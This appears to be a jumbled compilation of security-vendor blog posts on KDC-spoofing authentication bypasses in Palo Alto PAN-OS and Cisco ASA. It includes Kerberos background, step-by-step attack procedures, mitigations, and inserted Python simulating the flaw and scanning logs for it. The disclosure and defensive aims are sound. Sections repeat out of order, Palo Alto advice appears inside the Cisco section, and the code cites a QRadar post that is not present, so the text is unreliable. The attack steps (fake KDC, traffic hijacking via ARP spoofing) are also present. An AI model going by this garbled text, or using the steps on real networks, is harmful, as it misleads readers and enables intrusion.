We discovered the vulnerability when we tried to add Silverfort's MFA to interfaces that rely on the Kerberos protocol, including the SSL VPN, Captive Portal and admin login. To set this up, we configured Kerberos as the authentication method and configured a matching MFA policy on the Silverfort side. A detailed explanation of the Kerberos protocol and KDC spoofing can be found at the end of this article.

As seen below, the network capture includes an AS-REQ and an AS-REP but no TGS-REQ. The authentication was successful even though the TGS-REQ, which the protocol requires, was missing from the authentication process. Since we had already discovered a similar vulnerability in Cisco ASA, we wanted to verify this. We went back and checked the Palo Alto Networks guide for configuring Kerberos authentication (below is a screenshot of the guide at that time) and realized that we were not required to configure a keytab or a service password at any point of the configuration process. PAN-OS provides an option to configure a keytab, but it is optional, and even when a keytab was configured, we saw that it was not used for authentication to the interfaces in question. Without a keytab or a password, PAN-OS does not have the credentials required to validate the authenticity of the KDC. This means that PAN-OS is susceptible to KDC spoofing.

### Attempting to Exploit the Vulnerability

Now that we knew that PAN-OS was vulnerable, we simulated an attack by redirecting the traffic between PAN-OS and the KDC (in this case the domain controller) on port 88 (the Kerberos port) to our own Windows Server. We set up a fake domain on that server and made sure it contained a user with the same User Principal Name (UPN) as the PAN-OS administrator in the real domain. For this example we will call him Bob. We configured that user's password in the fake domain to be "1". We then tried the following situations:

- Regular login (traffic not diverted): we managed to log in with Bob's original password, as expected. With the password "1", the login failed.
- Login with the traffic diverted to our fake DC: logging in with Bob's original password failed, but logging in with the password "1" worked.

### Prevention and Mitigation

Mitigation steps for security professionals:

1. First and foremost, upgrade your PAN-OS to a fixed version and make the required configuration changes detailed in the Palo Alto Networks advisory.
2. Continuously monitor your Kerberos authentication. Look for resources that send only AS_REQs; if there are no TGS_REQs from a resource, it is a red flag.
3. Use Silverfort's open source tool to search the authentication logs for services that do not request service tickets.
4. See the developer recommendations below for any internally developed applications that implement Kerberos, and for systems you configured yourself.
5. Silverfort customers leveraging step-up authentication with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS.

As a developer, we recommend a few steps to make sure that your solution is not susceptible to KDC spoofing:

1. Validate that your Kerberos implementation requires a password or keytab. To validate the DC, you need some kind of shared secret. If your solution does not allow configuring a keytab file or a service account password, the application is certainly susceptible to KDC spoofing.
2. Run Wireshark and look at which Kerberos requests are sent during authentication. If there is no TGS_REQ, it is a red flag.
3. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols.
4. Use third-party libraries properly. Some third-party libraries require specific configuration to avoid KDC spoofing. For example, pam-krb5, a common Kerberos library, has to have a keytab configured to work properly; see the relevant paragraph in its documentation (https://github.com/rra/pam-krb5/blob/master/README.md).

### Background: An Overview of the Kerberos Protocol

The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network, and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments.

The protocol consists of three exchanges that provide mutual authentication between the user and the server being accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) exchange. The service ticket is then used during the Client/Server exchange to complete the authentication.

1. Authentication Service (AS) Exchange

During the AS exchange the user authenticates to the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate to services in the network without re-entering credentials. When the user first enters their credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ carries pre-authentication data encrypted with the user's master key, which is derived from the user's password. The Authentication Service, which is part of the KDC, verifies the AS_REQ with that master key, which is also available to the KDC. After validating the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket Granting Ticket (TGT) encrypted with the KDC's own key. The AS exchange is outlined below.
The TGT will be used in the TGS exchange to obtain access to specific services.

2. Ticket Granting Service (TGS) Exchange

When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Service (TGS) function of the KDC. This message is encrypted with the logon session key obtained during the AS exchange. The TGS verifies the TGS_REQ and returns a TGS_REP, which contains a service session key and a service ticket encrypted with the master key of the server that hosts the service. On a Unix-based server, that master key is configured in a file called a keytab; on a Windows member server, it is derived from the computer account's password. The TGS exchange is outlined below.

3. Client/Server Exchange

Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, carrying the service ticket and an authenticator encrypted with the service session key. The service decrypts the service ticket with its own master key, recovers the service session key and uses it to validate the authenticator. Then the server returns an AP_REP message and the authentication is complete. The Client/Server exchange is outlined below.

### Spoof-Proof Protocol

When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. That is because even if the attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket: the service ticket is encrypted with the server's key, which the attacker does not have.

### What is KDC Spoofing?

In 2000, Dug Song, who later co-founded Duo Security, reported a technique for bypassing Kerberos authentication in some situations. He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges alone. Unfortunately, this behavior is not secure and can be exploited. An attacker that is able to hijack the communication between the client and the DC can take the following steps:

1. Create a fake KDC.
2. Obtain a username authorized to access the service you want to attack.
3. Create a user in the fake KDC with a password of the attacker's choice. For the demonstration, let's call this password "1".
4. Authenticate to the service with the obtained username and the password "1".
5. Hijack the communication from the client to the DC and divert it to the fake KDC.
6. During the AS exchange, return an AS_REP that corresponds to the password "1", the fake KDC key and a fake logon session key.
7. During the TGS exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange.

KDC spoofing attacks assume the attacker is able to hijack traffic to and from the KDC and answer on the KDC's behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack, as outlined in Network Security Hacks (Lockhart, 2007). Another approach is to take over a networking device such as a switch or router and control the communication from there.

---
- Published: 2020-05-14
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125-2/

Security researchers at Silverfort, provider of an agentless authentication platform, identified a severe vulnerability that can enable attackers to gain control over Cisco Adaptive Security Appliance (ASA). All ASA versions are affected. After Silverfort disclosed the vulnerability to Cisco, Cisco fixed all supported versions of ASA and published an advisory. The vulnerability (CVE-2020-3125) was assigned a CVSS score of 8.1 out of 10, which is considered "High", because it allows an attacker to bypass Kerberos authentication to Cisco ASA. The Silverfort researchers credited with discovering the vulnerability are Yoav Iellin, Yaron Kassner, Dor Segal and Rotem Zach.

Cisco fixed this vulnerability in all supported versions of ASA. We highly recommend that enterprises upgrade to the latest ASA versions to protect against an exploit.

This article outlines the KDC spoofing vulnerability and shows how it can be used to bypass authentication to Cisco ASA. It explains how to avoid these vulnerabilities, both as a developer implementing Kerberos and as an enterprise that has already deployed such solutions in its network.

### Explaining the Vulnerability

The vulnerability lies in Cisco's Kerberos implementation. Kerberos is the most common protocol for on-premises authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Cisco uses Kerberos in many ASA interfaces, for example VPN, opening firewall sessions, and administrative access through either the web management console or SSH. Therefore, bypassing Kerberos authentication allows an attacker to take over the Cisco appliance, bypass its security and gain access to other networks.

For the Kerberos protocol to work, three things should happen:

- the user authenticates to the server
- the server authenticates to the client
- the KDC authenticates to the server

Apparently, KDC authentication to the server is often overlooked, perhaps because requiring it complicates the configuration. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised: an attacker that hijacked the network traffic can authenticate to Cisco ASA with any password, even a wrong one.
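The three requirements above, and the same point made for PAN-OS and QRadar earlier on this page, can be made concrete with a toy model of the protocol. The following Python is an added example, not from the post and not any vendor's code. It models a KDC (AS and TGS), a login routine that stops after the AS exchange the way the vulnerable products did, and a spoof-proof login that requests a ticket for its own SPN and verifies it with its keytab key. HMAC sealing stands in for Kerberos encryption: it captures only the property the attack hinges on, that nobody can produce a ticket that verifies under a long-term key they do not hold. Realm, usernames, passwords and the SPN are made up for the demonstration.

```python
import hashlib
import hmac
import json
import os


def string_to_key(password: str, realm: str, principal: str) -> bytes:
    # Kerberos derives a principal's long-term key from the password and a salt (realm + name);
    # PBKDF2 stands in for the real string-to-key function here.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), (realm + principal).encode(), 10_000)


def seal(key: bytes, payload: dict) -> dict:
    # Toy "encryption": an HMAC tag under `key`. No confidentiality, only the unforgeability we need.
    body = json.dumps(payload, sort_keys=True)
    return {"body": body, "tag": hmac.new(key, body.encode(), "sha256").hexdigest()}


def unseal(key: bytes, blob: dict) -> dict:
    tag = hmac.new(key, blob["body"].encode(), "sha256").hexdigest()
    if not hmac.compare_digest(tag, blob["tag"]):
        raise ValueError("wrong key or tampered blob")
    return json.loads(blob["body"])


class KDC:
    """Authentication Service and Ticket Granting Service for one realm (real or attacker-run)."""

    def __init__(self, realm: str, users: dict, service_keys: dict):
        self.realm = realm
        self.user_keys = {u: string_to_key(p, realm, u) for u, p in users.items()}
        self.krbtgt_key = os.urandom(32)      # seals TGTs; private to this KDC
        self.service_keys = service_keys      # SPN -> long-term key, i.e. what the service's keytab holds

    def as_exchange(self, user: str, preauth: dict) -> dict:
        key = self.user_keys.get(user)
        if key is None:
            return {"error": "KDC_ERR_C_PRINCIPAL_UNKNOWN"}
        try:
            unseal(key, preauth)               # PA-ENC-TIMESTAMP: proves the client knows the password
        except ValueError:
            return {"error": "KDC_ERR_PREAUTH_FAILED"}
        logon_key = os.urandom(16).hex()
        return {"tgt": seal(self.krbtgt_key, {"user": user, "logon_key": logon_key}),
                "enc_part": seal(key, {"logon_key": logon_key})}

    def tgs_exchange(self, tgt: dict, spn: str) -> dict:
        try:
            tgt_data = unseal(self.krbtgt_key, tgt)
        except ValueError:
            return {"error": "KRB_AP_ERR_BAD_INTEGRITY"}
        if spn not in self.service_keys:
            return {"error": "KDC_ERR_S_PRINCIPAL_UNKNOWN"}
        svc_key = os.urandom(16).hex()
        return {"ticket": seal(self.service_keys[spn], {"user": tgt_data["user"], "svc_key": svc_key}),
                "enc_part": seal(bytes.fromhex(tgt_data["logon_key"]), {"svc_key": svc_key})}


def _as_step(kdc: KDC, realm: str, user: str, password: str):
    """AS exchange as the application performs it. Returns the TGT, or None if the AS_REP does not decrypt."""
    key = string_to_key(password, realm, user)
    rep = kdc.as_exchange(user, seal(key, {"ts": "2020-05-14T10:00:00"}))
    if "error" in rep:
        return None
    try:
        unseal(key, rep["enc_part"])
    except ValueError:
        return None
    return rep["tgt"]


def login_vulnerable(kdc: KDC, realm: str, user: str, password: str) -> bool:
    """The bypassed pattern: an AS_REP that decrypts with the supplied password counts as authentication.
    Whoever answers on port 88 decides the outcome; nothing ties the answer to the real KDC."""
    return _as_step(kdc, realm, user, password) is not None


def login_spoof_proof(kdc: KDC, realm: str, user: str, password: str, own_spn: str, keytab_key: bytes) -> bool:
    """Finish the protocol: request a ticket to our own SPN and verify it with our keytab key.
    Only a KDC holding that key can mint a ticket that unseals here; a KDC error is a failed login."""
    tgt = _as_step(kdc, realm, user, password)
    if tgt is None:
        return False
    tgs = kdc.tgs_exchange(tgt, own_spn)
    if "error" in tgs:
        return False
    try:
        ticket = unseal(keytab_key, tgs["ticket"])
    except ValueError:
        return False                       # fake KDC: ticket sealed with a key that is not ours
    return ticket["user"] == user


def demo() -> dict:
    realm, spn = "CORP.LOCAL", "HTTP/asa.corp.local"        # made-up realm and SPN
    keytab_key = os.urandom(32)                               # shared by the real KDC and the appliance
    real_kdc = KDC(realm, {"bob": "correct horse battery"}, {spn: keytab_key})
    # Attacker's KDC on the diverted port 88: same realm name and username, password "1", guessed service key.
    fake_kdc = KDC(realm, {"bob": "1"}, {spn: os.urandom(32)})
    return {
        "real_kdc_right_pw_vuln": login_vulnerable(real_kdc, realm, "bob", "correct horse battery"),
        "real_kdc_wrong_pw_vuln": login_vulnerable(real_kdc, realm, "bob", "1"),
        "fake_kdc_pw1_vuln": login_vulnerable(fake_kdc, realm, "bob", "1"),       # the bypass
        "fake_kdc_pw1_fixed": login_spoof_proof(fake_kdc, realm, "bob", "1", spn, keytab_key),
        "real_kdc_right_pw_fixed": login_spoof_proof(real_kdc, realm, "bob", "correct horse battery", spn, keytab_key),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case:26} {'accepted' if ok else 'rejected'}")
```

The `fake_kdc_pw1_vuln` case is the attack described in these posts: the same username, password "1", traffic diverted, login accepted. The `fake_kdc_pw1_fixed` case shows why the keytab matters: without the service's long-term key the fake KDC cannot produce a service ticket that unseals, and returning an error instead (the QRadar variant) fails just the same.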
### Background: An Overview of the Kerberos Protocol

The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network, and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments.

The protocol consists of three exchanges that provide mutual authentication between the user and the server being accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) exchange. The service ticket is then used during the Client/Server exchange to complete the authentication.

1. Authentication Service (AS) Exchange

During the AS exchange the user authenticates to the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate to services in the network without re-entering credentials. When the user first enters their credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ carries pre-authentication data encrypted with the user's master key, which is derived from the user's password. The Authentication Service, which is part of the KDC, verifies the AS_REQ with that master key, which is also available to the KDC. After validating the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket Granting Ticket (TGT) encrypted with the KDC's own key. The AS exchange is outlined below. The TGT will be used in the TGS exchange to obtain access to specific services.

2. Ticket Granting Service (TGS) Exchange

When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Service (TGS) function of the KDC. This message is encrypted with the logon session key obtained during the AS exchange. The TGS verifies the TGS_REQ and returns a TGS_REP, which contains a service session key and a service ticket encrypted with the master key of the server that hosts the service. On a Unix-based server, that master key is configured in a file called a keytab; on a Windows member server, it is derived from the computer account's password. The TGS exchange is outlined below.

3. Client/Server Exchange

Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, carrying the service ticket and an authenticator encrypted with the service session key. The service decrypts the service ticket with its own master key, recovers the service session key and uses it to validate the authenticator. Then the server returns an AP_REP message and the authentication is complete. The Client/Server exchange is outlined below.

### Spoof-Proof Protocol

When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. That is because even if the attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket: the service ticket is encrypted with the server's key, which the attacker does not have.

### What is KDC Spoofing?

In 2000, Dug Song reported a vulnerability that affects the Kerberos protocol (Song, Dug. 2000. "Kerberos KDC Spoofing Vulnerability", 28 August). He discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges alone. Unfortunately, this behavior is not secure and can be exploited. An attacker that is able to hijack the communication between the client and the DC can take the following steps:

1. Create a fake KDC.
2. Obtain a username authorized to access the service you want to attack.
3. Create a user in the fake KDC with a password of the attacker's choice. For the demonstration, let's call this password "1".
4. Authenticate to the service with the obtained username and the password "1".
5. Hijack the communication from the client to the DC and divert it to the fake KDC.
6. During the AS exchange, return an AS_REP that corresponds to the password "1", the fake KDC key and a fake logon session key.
7. During the TGS exchange, return any TGS_REP. The client will accept the authentication without performing an application exchange.

KDC spoofing attacks assume the attacker is able to hijack traffic to and from the KDC and answer on the KDC's behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack, as outlined in Network Security Hacks (Lockhart, 2007). Another approach is to take over a networking device such as a switch or router and control the communication from there.

### How We Discovered the Vulnerability in Cisco ASA

We were looking for a way to add Multi-Factor Authentication (MFA) for administrators accessing Cisco ASA and AnyConnect VPN. After configuring Cisco ASA to use Kerberos as the authentication protocol, we examined the authentication logs in Silverfort's console. Silverfort provides full visibility into all authentication activity in the network, and its logs showed that Cisco ASA was requesting a TGT without requesting a service ticket. We went back to the configuration guide (Cisco. 2007. "PIX/ASA: Kerberos Authentication and LDAP Authorization Server Groups for VPN Client Users via ASDM/CLI Configuration Example", 30 July) and looked at the parameters required to configure Kerberos authentication. As seen above, there is no place to enter a password or keytab for Kerberos authentication. A password or keytab is required for a correct implementation, since it provides the secret Kerberos uses to establish trust with the KDC. Without that secret, authentication cannot be cryptographically trusted.

We went ahead and tried the same for other Cisco interfaces and saw that the same vulnerability exists when opening firewall sessions, for administrative authentication and even when using SSH to access the VM. See the Kerberos column in the table below, which summarizes Cisco's support for different authentication protocols.

### Exploitation

Next, we wanted to see whether this vulnerability could be exploited. For that, we hijacked the Kerberos traffic intended for the DC and diverted it to our server. Instead of developing our own KDC logic, we simply installed Active Directory Domain Services on our rogue server, promoting it to a domain controller. Of course, not being an admin in the original domain, we created a new fake domain. Since we knew the username of the Cisco administrator in the real domain (Bob in this example), we created a user named Bob in our fake domain and configured his password there to be "1". We then tried the following situations:

- Regular login (traffic not diverted): we managed to log in with Bob's original password, as expected. With the password "1", the login failed.
- Login with the traffic diverted to our fake DC: logging in with Bob's original password failed, but logging in with the password "1" worked.

### Prevention and Mitigation

Mitigation steps for security professionals:

1. First of all, upgrade your Cisco ASA to a fixed version and make the required configuration changes detailed in the Cisco advisory.
2. Continuously monitor your Kerberos authentication. Look for resources that send only AS_REQs; if there are no TGS_REQs from a resource, it is a red flag.
3. Use Silverfort's open source tool to search the authentication logs for services that do not request service tickets.
4. See the developer recommendations for any internally developed applications that implement Kerberos, and for systems you configured yourself.
Silverfort customers are leveraging the step-up authentication capability with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS. As a Developer We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing: Validate that the implementation of Kerberos requires a password or keytab: To validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file, or a service account password, the application is surely susceptible to KDC spoofing. Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) --- - Published: 2020-05-14 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002-2/ Palo Alto Networks published an advisory about a KDC-spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo Alto Networks by Silverfort researchers Yoav Iellin, Yaron Kassner and Rotem Zach. The vulnerability affected all supported versions of PAN-OS, and all interfaces that used a Kerberos authentication profile. After disclosing the vulnerability, Palo Alto Networks fixed all supported versions of PAN-OS and published an advisory about it. 
The vulnerability can allow an attacker to bypass the Kerberos authentication to PAN-OS and gain access to the administrative interfaces of PAN-OS, as well as authentication to firewall sessions through the captive portal. This vulnerability is similar to a KDC spoofing vulnerability our researchers discovered in Cisco ASA. It seems that the implementation of the Kerberos authentication protocol is not always completed correctly, leaving systems vulnerable to exploits.

Palo Alto Networks fixed this vulnerability in all versions of PAN-OS. We highly recommend deploying this patch to protect against an exploit.

This article outlines the KDC spoofing vulnerability in PAN-OS and shows how it can be used to bypass the authentication without knowing the password. It explains how to avoid these vulnerabilities as a developer implementing Kerberos, as well as for enterprises using Kerberos authentication to their systems.

## Explaining the Vulnerability

The vulnerability lies in Palo Alto Networks’s Kerberos implementation. Kerberos is the most common authentication protocol for on-premise authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Palo Alto Networks uses the Kerberos authentication protocol in many PAN-OS interfaces – for example, SSL VPN, Captive Portal or Administrator login. Therefore, bypassing Kerberos authentication allows an attacker to administer Palo Alto Networks Strata, bypass its security, and gain access to additional networks.

For the Kerberos protocol to work, three things should happen:

- the user authenticates to the server
- the server authenticates to the client
- the KDC authenticates to the server

Apparently, KDC authentication to the server is often overlooked, perhaps because requiring it complicates the configuration requirements. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker that hijacked the network traffic to authenticate to PAN-OS with any password, even a wrong one.

## Discovering the Vulnerability in PAN-OS

We discovered the vulnerability when we tried to add Silverfort’s MFA to interfaces that rely on the Kerberos protocol, including the SSL VPN, Captive Portal and Admin Login. In order to set this up, we configured Kerberos as the authentication method and configured a matching MFA policy on the Silverfort side. A detailed explanation about the Kerberos protocol and KDC spoofing can be found at the end of this article.

As seen below, the network capture includes an AS-REQ and an AS-REP but no TGS-REQ:

The authentication was successful even though the TGS-REQ is required by the protocol and was missing from the authentication process. Since we had already discovered a similar vulnerability with Cisco ASA, we wanted to verify this. We went back and checked the Palo Alto Networks guide for configuring Kerberos authentication – below is a screenshot of the guide at that time:

We realized that we were not required to configure a keytab or a service password at any point of the configuration process. PAN-OS provides an option to configure a keytab, but it was optional. However, even if the keytab was configured, we saw that it was not used for the authentication process to the said interfaces. Without a keytab or a password, PAN-OS does not have the credentials required to validate the authenticity of the KDC. This means that PAN-OS is susceptible to KDC spoofing.

## Attempting to Exploit the Vulnerability

Now that we knew that PAN-OS is vulnerable, we simulated an attack by redirecting the traffic between PAN-OS and the KDC, in this case the domain controller, on port 88 (the Kerberos port), to our own Windows Server. We set up a fake domain on the Windows server and made sure there is a user with the same User Principal Name (UPN) as the PAN-OS administrator in the real domain. For this example we will call him ‘Bob’. We configured that user’s password to be “1” in the fake domain. We then tried the following situations:

- Regular login (traffic not diverted) – we managed to log in with Bob’s original password, as expected. When trying the password “1”, the login failed.
- Logging in with the traffic diverted to our fake DC – logging in with Bob’s original password failed, but logging in with the password “1” worked.

## Prevention and Mitigation

### Mitigation Steps for Security Professionals

- First and foremost, upgrade your PAN-OS to a fixed version and make the required configuration changes detailed in the Palo Alto Networks advisory.
- Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it’s a red flag. Use Silverfort’s open source tool to search the authentication logs for services that don’t request service tickets.
- See the developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself.
- Silverfort customers who are leveraging the step-up authentication capability with Palo Alto Networks should update their Silverfort MFA policy from a TGT policy to a service ticket policy after upgrading their PAN-OS.

### As a Developer

We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing:

Validate that the implementation of Kerberos requires a password or keytab: to validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file or a service account password, the application is surely susceptible to KDC spoofing.

Run Wireshark – use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it’s a red flag.
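One way to run the log check from the two recommendations above (a resource that only ever sends AS_REQs and never a TGS_REQ is a red flag), as an added example that is not Silverfort’s open source tool: it reads constructed CSV records keyed by the Windows domain controller security event IDs 4768 (TGT requested) and 4769 (service ticket requested) and reports client addresses that obtained TGTs without ever requesting a service ticket.

```python
"""Scan Kerberos authentication records for hosts that obtain TGTs but never
request service tickets, the pattern the post calls a red flag. Added example,
not Silverfort's tool; the CSV layout is constructed for the demo and uses the
Windows DC security event IDs 4768 (TGT requested) and 4769 (service ticket
requested)."""
import csv
from collections import defaultdict

TGT_REQUESTED = "4768"    # AS exchange: a TGT was requested
SERVICE_TICKET = "4769"   # TGS exchange: a service ticket was requested
SUCCESS = "0x0"           # Kerberos result code for success


def find_as_only_clients(lines, min_tgt_requests=1):
    """Return {client_ip: {"tgt_requests": n, "accounts": [...]}} for every
    client address that successfully requested at least min_tgt_requests TGTs
    and never requested a single service ticket. Failed TGT requests (wrong
    password, result 0x18) are ignored: no login completed there, so there
    was nothing to bypass."""
    tgt_count = defaultdict(int)
    accounts = defaultdict(set)
    saw_service_ticket = set()
    for row in csv.DictReader(lines):
        if row["event_id"] == SERVICE_TICKET:
            saw_service_ticket.add(row["client_ip"])
        elif row["event_id"] == TGT_REQUESTED and row["result"] == SUCCESS:
            tgt_count[row["client_ip"]] += 1
            accounts[row["client_ip"]].add(row["account"])
    return {
        ip: {"tgt_requests": n, "accounts": sorted(accounts[ip])}
        for ip, n in tgt_count.items()
        if ip not in saw_service_ticket and n >= min_tgt_requests
    }


# Constructed sample: two workstations behave normally (TGT followed by service
# tickets), 10.0.0.250 authenticates two users by the AS exchange alone, and
# 10.0.0.99 only produced a failed pre-authentication.
SAMPLE_LOG = """\
time,event_id,account,client_ip,result
2020-05-01T08:00:01Z,4768,bob,10.0.0.21,0x0
2020-05-01T08:00:01Z,4769,bob,10.0.0.21,0x0
2020-05-01T08:00:02Z,4769,bob,10.0.0.21,0x0
2020-05-01T08:05:10Z,4768,bob,10.0.0.250,0x0
2020-05-01T08:05:11Z,4768,alice,10.0.0.250,0x0
2020-05-01T08:07:00Z,4768,mallory,10.0.0.99,0x18
2020-05-01T08:09:00Z,4768,alice,10.0.0.22,0x0
2020-05-01T08:09:01Z,4769,alice,10.0.0.22,0x0
"""


def scan_sample():
    return find_as_only_clients(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for ip, info in scan_sample().items():
        print(f"{ip}: {info['tgt_requests']} TGT(s) for {info['accounts']}, "
              "no service tickets: check whether this host authenticates users "
              "with the AS exchange alone")
```

On a real domain controller the same fields come from the 4768/4769 events (Client Address, Account Name, Result Code), so the function can be fed exported event data once the column names are mapped.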
If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently. We recommend taking the easier route and using an existing implementation of these protocols.

Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5 has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github.com/rra/pam-krb5/blob/master/README.md):

## Background

### An overview of the Kerberos Protocol

The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network, and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments.

The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When users log in, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication:

### 1. Authentication Service (AS) Exchange

During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the master key, which is a function of the user’s password. The Authentication Service, which is part of the KDC, verifies the AS_REQ according to the master key, which is also available to the KDC. After validating the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT) that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services.

### 2. Ticket-Granting Service (TGS) Exchange

When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. On a Unix-based system, the master key of the server is configured in a file called a keytab file. On a domain member server, the master key is derived from the computer account’s password. The TGS Exchange is outlined below.

### 3. Client/Server Exchange

Now the client has everything it needs to authenticate to the service. The client sends an AP_REQ to the service, which is encrypted with the service session key. The service decrypts the service ticket with its own key, recovers the service session key and uses it to validate the AP_REQ. Then the server returns an AP_REP message and the authentication is complete. The client-server exchange is outlined below:

### Spoof-Proof Protocol

When the Kerberos protocol is implemented correctly, an attacker attempting to impersonate the KDC cannot bypass the authentication. Even if an attacker successfully creates a valid AS_REP in response to a hijacked AS_REQ, the attacker will never be able to engineer a valid service ticket, because the service ticket is encrypted with the server key, a key that the attacker does not have.

### What is KDC Spoofing?
In 2000, Dug Song, who later co-founded Duo Security, reported a technique used to bypass the Kerberos protocol in some situations: he discovered that certain implementations and configurations of Kerberos clients fail to execute the Client/Server exchange, and allow the authentication based on the success of the previous exchanges. Unfortunately, this behavior is not secure and can be exploited by an attacker.

An attacker that is able to hijack the communication between the client and the DC can take the following steps:

1. Create a fake KDC.
2. Obtain a username authorized to access the service you want to attack.
3. Create a user in the fake KDC with a password of the attacker’s choice. For the demonstration, let’s call this password ”1”.
4. Authenticate to the service with the obtained username and the password ”1”.
5. Hijack the communication from the client to the DC and divert it to the fake KDC.
6. During the AS Exchange, return an AS_REP that corresponds to the password ”1”, the fake KDC key, and a fake logon session key.
7. During the TGS Exchange, return any TGS_REP.
8. The client will accept the authentication without performing an application exchange.

The KDC spoofing attacks assume the attacker is able to hijack traffic to and from the KDC and answer on the KDC’s behalf. This can be done using a variety of techniques. For example, if the attacker is within the same physical network segment as the client, it can perform an ARP spoofing attack as outlined in Network Security Hacks (Lockhart 2007). Another possible approach is to take over a networking device such as a switch or router and control the communication from there.

---
- Published: 2020-05-06
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/cisco-vulnerability-cve-2020-3125/

Security researchers at Silverfort, provider of an agentless authentication platform, identified a severe vulnerability that can enable hackers to gain control over Cisco Adaptive Security Appliance (ASA). All ASA versions are affected. After disclosing the vulnerability to Cisco, Cisco fixed all supported versions of ASA and published an advisory on it. The vulnerability (CVE-2020-3125) was assigned a CVSS risk score of 8.1 out of 10, which is considered “High.” This is because the vulnerability can allow an attacker to bypass the Kerberos authentication to Cisco ASA. Silverfort researchers credited for discovering the vulnerability are: Yoav Iellin, Yaron Kassner, Dor Segal & Rotem Zach.

